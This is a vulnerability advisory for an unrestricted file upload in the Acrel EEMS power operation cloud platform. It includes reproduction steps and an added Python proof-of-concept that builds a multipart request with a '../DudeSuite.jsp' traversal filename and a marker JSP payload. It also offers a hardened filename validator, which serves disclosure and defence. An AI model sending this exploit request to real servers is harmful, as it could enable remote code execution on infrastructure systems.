Acrel EEMS Enterprise Power Operation and Maintenance Cloud Platform Unrestricted File Upload Vulnerability
Vulnerability
An unrestricted file upload vulnerability has been identified in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform version 1.3.0. The flaw lies in an unknown function behind the endpoint '/SubstationWEBV2/main/uploadH5Files': the handler does not restrict what is uploaded through the 'File' argument, so the issue can be exploited remotely.
Impact
Exploitation allows an attacker to upload files of arbitrary type to the server. The reproduction below places a '../' traversal sequence in the filename and uses a .jsp extension, so the uploaded content may be written outside the intended upload directory and, if that location is served by the servlet container and processed by the JSP engine, executed as server-side code. Whether execution actually occurs depends on where the file lands, on the file type and on the server's configuration.
Reproduction
To reproduce, send a POST request with 'Content-Type: multipart/form-data' to '/SubstationWEBV2/main/uploadH5Files' whose 'file' part carries a file named '../DudeSuite.jsp' containing a payload such as '<%="aaaaaaaaaaaaaaaaa"%>'. Include the 'Origin' and 'Referer' headers in the request. The request can be built with a tool like Burp Suite or Postman. The JSP expression tag is a harmless marker: if the stored file is later requested and the JSP engine processes it, the response contains only 'aaaaaaaaaaaaaaaaa'; if the raw '<%= ... %>' tag comes back unchanged, the file was stored but not executed.
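The request described above, built with the Python standard library, together with the success check and the server-side filename validation that would have blocked it. This is an added example, not code from the original advisory or from Acrel. The path, form field name, filename and JSP payload are taken from the reproduction section; the target host, the Origin/Referer values, the allow-list of extensions and the safe_upload_name() check are assumptions of this example.

```python
"""PoC request builder for the uploadH5Files issue plus a hardened upload check.
Added example; not Acrel code. Host, Origin/Referer and the extension
allow-list are assumptions."""
import os
import re
import uuid

TARGET_PATH = "/SubstationWEBV2/main/uploadH5Files"
FIELD_NAME = "file"                  # form field named in the reproduction
EVIL_FILENAME = "../DudeSuite.jsp"   # traversal prefix plus an executable extension
JSP_PAYLOAD = '<%="aaaaaaaaaaaaaaaaa"%>'  # prints the marker only if the JSP engine runs it
MARKER = "aaaaaaaaaaaaaaaaa"


def build_multipart(field_name, filename, content, boundary=None):
    """Return (content_type, body) for a single-file multipart/form-data POST."""
    boundary = boundary or "----PoC" + uuid.uuid4().hex
    if isinstance(content, str):
        content = content.encode()
    body = b"".join([
        b"--" + boundary.encode() + b"\r\n",
        b'Content-Disposition: form-data; name="' + field_name.encode()
        + b'"; filename="' + filename.encode() + b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n",
        content + b"\r\n",
        b"--" + boundary.encode() + b"--\r\n",
    ])
    return "multipart/form-data; boundary=" + boundary, body


def build_request(host="eems.example.invalid", scheme="http"):
    """Assemble method, path, headers and body of the PoC (host is a placeholder)."""
    content_type, body = build_multipart(FIELD_NAME, EVIL_FILENAME, JSP_PAYLOAD)
    origin = f"{scheme}://{host}"
    headers = {
        "Host": host,
        "Content-Type": content_type,
        "Content-Length": str(len(body)),
        "Origin": origin,          # the advisory says these two headers must be present
        "Referer": origin + "/",
    }
    return "POST", TARGET_PATH, headers, body


def payload_executed(response_text):
    """True only when the stored JSP was actually run: the bare marker is present
    and the expression tag is gone. A response still containing '<%=' means the
    source was served raw, i.e. the file was stored but not executed."""
    return MARKER in response_text and "<%=" not in response_text


# Hardened check the upload handler should apply before touching the filesystem.
# The allow-list is an assumption for an "H5 files" endpoint, not Acrel's policy.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".html", ".css", ".js"}


def safe_upload_name(client_filename):
    """Return a server-chosen filename for an acceptable upload, or None to reject it."""
    # Drop any client-supplied directory part, whether POSIX or Windows style.
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        return None
    # Only plain characters in the name: blocks NUL, '%00' tricks and whitespace games.
    if not re.fullmatch(r"[A-Za-z0-9._-]+", base):
        return None
    stem, ext = os.path.splitext(base)
    # Last extension decides; 'shell.png.jsp' is rejected, 'shell.jsp.png' is a .png.
    if not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    # Never reuse the client's stem: the stored path must not be attacker-chosen.
    return uuid.uuid4().hex + ext.lower()


if __name__ == "__main__":
    method, path, headers, body = build_request()
    print(method, path)
    for k, v in headers.items():
        print(f"{k}: {v}")
    print()
    print(body.decode())
    print("server-side verdict on", EVIL_FILENAME, "->", safe_upload_name(EVIL_FILENAME))
```

build_request() returns the raw pieces rather than sending them so the body can be pasted into Burp or Postman. After the upload, fetch the stored file and pass the response body to payload_executed(): the distinction it draws (marker echoed versus tag returned verbatim) is what separates code execution from a mere arbitrary write. On the defensive side, safe_upload_name() rejects the PoC filename twice over, once for the traversal component and once for the .jsp extension, and replaces any accepted name with a server-generated one.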
